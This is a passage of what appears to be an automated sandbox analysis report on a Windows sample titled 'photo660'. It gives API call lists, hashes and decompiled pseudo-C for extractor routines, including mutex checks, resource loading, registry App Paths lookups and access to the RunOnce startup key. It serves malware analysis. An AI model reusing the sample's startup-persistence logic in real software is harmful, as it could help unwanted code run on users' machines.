                                                                                                                                                                                                        0x00212dae
                                                                                                                                                                                                        0x00212db4
                                                                                                                                                                                                        0x00212dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212dca
                                                                                                                                                                                                        0x00212dd3
                                                                                                                                                                                                        0x00212df5
                                                                                                                                                                                                        0x00212e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212dd5
                                                                                                                                                                                                        0x00212dde
                                                                                                                                                                                                        0x00212de3
                                                                                                                                                                                                        0x00212e04
                                                                                                                                                                                                        0x00212e0a
                                                                                                                                                                                                        0x00212e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212e10
                                                                                                                                                                                                        0x00212dd3
                                                                                                                                                                                                        0x00212dbb
                                                                                                                                                                                                        0x00212da1
                                                                                                                                                                                                        0x00212d5b
                                                                                                                                                                                                        0x00212d5b
                                                                                                                                                                                                        0x00212d5d
                                                                                                                                                                                                        0x00212d69
                                                                                                                                                                                                        0x00212d6e
                                                                                                                                                                                                        0x00212f06
                                                                                                                                                                                                        0x00212f06
                                                                                                                                                                                                        0x00212f06
                                                                                                                                                                                                        0x00212d59
                                                                                                                                                                                                        0x00212f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212CF9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00212D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00212D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00212DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00212DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(photo660,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00212E0A
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$photo660
                                                                                                                                                                                                        • API String ID: 1002816675-3055790139
                                                                                                                                                                                                        • Opcode ID: 4cf819d26d5aadfa0b36eee88c14ea8037102706659f4322d6a0b8e581da6ef6
                                                                                                                                                                                                        • Instruction ID: 410c3ef8402eb3792c112d3d9569364a03375c2b21afe552af5314df0c49f4ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cf819d26d5aadfa0b36eee88c14ea8037102706659f4322d6a0b8e581da6ef6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD51D470770302EBE724AB20AC5EBFB36D9DB76700F108035BA45D61D1DEB498F98A15
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E002134F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0x2191d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0x218584 = _t35;
                                                                                                                                                                                                        					E002143D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0x218184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "photo660");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00214FE0, 0, 0, 0x218798);
                                                                                                                                                                                                        					 *0x21879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E002144B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0x21858c);
                                                                                                                                                                                                        					_t38 =  *0x218584; // 0x0
                                                                                                                                                                                                        					_t25 = E002144B9(_t38, 0x4b2, 0x211140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0x2191d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0x21858c);
                                                                                                                                                                                                        						_t39 =  *0x21879c; // 0x0
                                                                                                                                                                                                        						E00213680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0x21858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0x21879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00213535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00213541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 0021355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00211140,00000000,00000020,00000004), ref: 00213590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002135C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 002135F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 002135F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00213610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00213617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00213623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00213637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00213671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 2406144884-1757243477
                                                                                                                                                                                                        • Opcode ID: a37c7eec539e6f23832a9aaf4170c7799e63e1f62941e22e7195ebce29960a95
                                                                                                                                                                                                        • Instruction ID: 4639288198f8b987b7a97ca2555fcc7c703494a699d3dfb2056ae99098ca6c2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a37c7eec539e6f23832a9aaf4170c7799e63e1f62941e22e7195ebce29960a95
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C310B74260341BBD7209F25FC4DEE63AEBE7B9B10F508429F609912E0CF7589A0CB55
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00214224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E002144B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0x2188c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0x2187a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0x218598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00214200;
                                                                                                                                                                                                        					_v28 = 0x2188c0;
                                                                                                                                                                                                        					 *0x21a288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0x21a288(_t32, 0x2188c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0x2188c0 != 0) {
                                                                                                                                                                                                        							E00211680(0x2187a0, 0x104, 0x2188c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x21a288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0x2187a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0x2188c0);
                                                                                                                                                                                                        					_t61 = 0x2188c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0x2188c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0x2188c0; // 0x431181
                                                                                                                                                                                                        					_t44 = CharPrevA(0x2188c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0x2188c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00214236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0021424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00214263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0021427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,002188C0,?,00000001), ref: 0021429F
                                                                                                                                                                                                        • CharPrevA.USER32(002188C0,00431181,?,00000001), ref: 002142C2
                                                                                                                                                                                                        • CharPrevA.USER32(002188C0,00000000,?,00000001), ref: 002142D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00214391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 002143A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 5764c03c5838bcae2de4d0504f4ae937002cb7069cc3ba308ea67ebe1abbfc3a
                                                                                                                                                                                                        • Instruction ID: 847403d4741ee8e3abe7f6d8c267b6491a37db2c20386ca2ca180f1c0508b492
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5764c03c5838bcae2de4d0504f4ae937002cb7069cc3ba308ea67ebe1abbfc3a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57412A74A11209AFD7117F60ECC8AED7BF4EB7A344F254069E949A3251CF748C92C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00212773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00211781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E0021658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E0021658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0x211140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00211680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(58AC7C6D,00000000,00000000,00000000), ref: 002127A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 002127B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 002127BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002128A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 002128AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 002128B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 002127E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: fc163e2699fd99fc968f3c439e84810396bfb782e3508b71d9c06224f94e5d02
                                                                                                                                                                                                        • Instruction ID: 913e72c70d8f263b915cc4c9b624bca9aa22d786f7cc9d9ee09843efda84ff60
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc163e2699fd99fc968f3c439e84810396bfb782e3508b71d9c06224f94e5d02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B419371A1012CABDB249F649C89AFA77FDEB79700F1140A5F549E2100DB704EE58FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00212267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0x218530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
